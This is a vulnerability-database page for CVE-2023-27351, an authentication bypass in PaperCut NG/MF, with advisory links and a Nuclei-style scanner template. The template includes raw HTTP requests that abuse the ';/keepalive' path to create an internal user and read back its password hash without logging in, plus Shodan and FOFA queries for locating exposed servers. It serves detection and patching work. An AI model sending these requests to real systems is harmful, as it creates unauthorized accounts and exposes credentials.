| Reporter | Title | Published | Views | Family All 31 |
|---|---|---|---|---|
| CVE-2023-27351 | 20 Apr 202316:15 | – | attackerkb | |
| CVE-2023-27350 | 20 Apr 202300:00 | – | attackerkb | |
| The vulnerability of the SecurityRequestFilter class in network printing control software such as PaperCut MF and PaperCut NG allows a perpetrator to access user credentials. | 2 May 202300:00 | – | bdu_fstec | |
| CVE-2023-27351 | 20 Apr 202320:30 | – | circl | |
| PaperCut NG/MF Improper Authentication Vulnerability | 20 Apr 202600:00 | – | cisa_kev | |
| CISA Adds Eight Known Exploited Vulnerabilities to Catalog | 20 Apr 202612:00 | – | cisa | |
| PaperCut NG 授权问题漏洞 | 20 Apr 202300:00 | – | cnnvd | |
| CVE-2023-27351 | 20 Apr 202300:00 | – | cve | |
| CVE-2023-27351 | 20 Apr 202300:00 | – | cvelist | |
| EUVD-2023-31127 | 3 Oct 202520:07 | – | euvd |
| Source | Link |
|---|---|
| papercut | www.papercut.com/kb/Main/PO-1216-and-PO-1219 |
| zerodayinitiative | www.zerodayinitiative.com/advisories/ZDI-23-232/ |
| nvd | www.nvd.nist.gov/vuln/detail/CVE-2023-27351 |
id: CVE-2023-27351
info:
name: PaperCut NG - Authentication Bypass
author: daffainfo,jjcho
severity: high
description: |
This vulnerability allows remote attackers to bypass authentication on affected installations of PaperCut NG 22.0.5 (Build 63914). Authentication is not required to exploit this vulnerability. The specific flaw exists within the SecurityRequestFilter class. The issue results from improper implementation of the authentication algorithm. An attacker can leverage this vulnerability to bypass authentication on the system. Was ZDI-CAN-19226.
impact: |
Attackers can bypass authentication, gaining unauthorized access to the system and potentially executing malicious actions.
remediation: |
Update to the latest version of PaperCut NG that addresses this issue or apply the security patch provided by the vendor.
reference:
- https://www.papercut.com/kb/Main/PO-1216-and-PO-1219
- https://www.zerodayinitiative.com/advisories/ZDI-23-232/
- https://nvd.nist.gov/vuln/detail/CVE-2023-27351
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N
cvss-score: 8.2
cve-id: CVE-2023-27351
epss-score: 0.7842
epss-percentile: 0.99531
cwe-id: CWE-287
cpe: cpe:2.3:a:papercut:papercut_mf:*:*:*:*:*:*:*:*,cpe:2.3:a:papercut:papercut_ng:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: papercut
product: papercut_mf,papercut_ng
shodan-query:
- http.html:"PaperCut"
- http.html:"papercut"
- http.html:"content=\"papercut\""
- cpe:"cpe:2.3:a:papercut:papercut_mf"
fofa-query:
- body="papercut"
- body="content=\"papercut\""
tags: cve2023,cve,papercut,auth-bypass,vkev,kev
flow: http(1) && http(2)
variables:
username: "{{randbase(8)}}"
password: "{{randstr}}"
http:
- raw:
- |
POST /rpc/api/rest/master/user/createInternalUser;/keepalive HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"username":["{{username}}"],"password":["{{password}}"]}
matchers:
- type: dsl
dsl:
- "contains(body, 'rO0A')"
- "contains(content_type, 'application/json')"
- "status_code == 200"
condition: and
internal: true
- raw:
- |
POST /rpc/api/rest/master/user/getExportedUser;/keepalive HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"username":["{{username}}"]}
matchers:
- type: dsl
dsl:
- "contains_all(body, 'java.lang.String', 'HASH:', '{{username}}')"
- "contains(content_type, 'application/json')"
- "status_code == 200"
condition: and
# digest: 4b0a00483046022100b162afd8121657d2ab689e06ba061262c3b9e089f0dfe8dea96d486806c588c0022100d4dbe0b8d71d0f7405c1ef4aebda1c869d54ded02cabad1db14530e0cf988201:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation